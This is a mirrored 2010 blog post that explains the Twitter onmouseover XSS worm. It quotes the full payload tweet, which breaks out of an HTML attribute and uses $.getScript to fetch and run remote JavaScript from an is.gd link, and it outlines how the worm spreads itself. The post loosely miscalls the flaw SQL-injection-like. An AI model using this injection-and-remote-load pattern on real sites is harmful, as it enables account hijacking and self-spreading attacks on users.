This is a mirror of official site: http://jasper-net.blogspot.com/

Write your own Twitter.com XSS exploit

| Wednesday, October 13, 2010
So it seems the new twitter.com has a “virus” going around. Few minutes ago my twitter stream filled up with strange jQuery calls so I looked into it. Apperantly the new Twitter website is colunerable to a simple SQL-Injection like attack. It’ll just spit out to the page whatever HTML code you write on your status…
So, the exploit work like this:

Step 1:
User writes the following status line:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′)”/

the @” basically closes the tweet’s html element title attribute and lets the hacker had his own attributes. Specifically an onmouseover attribute that’ll run his JavaScript code when the users hover over the tweet.

Step 2:
The onmouseover event fetches and executes a remote JS code from: http://is.gd/fl9A7

Step 3:
The remote script (which is not subject to size limits like the script embedded in the user’s status can basically do whatever the hacker wants. This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:

Read more: Developer Zen

Posted via email from .NET Info

0 comments: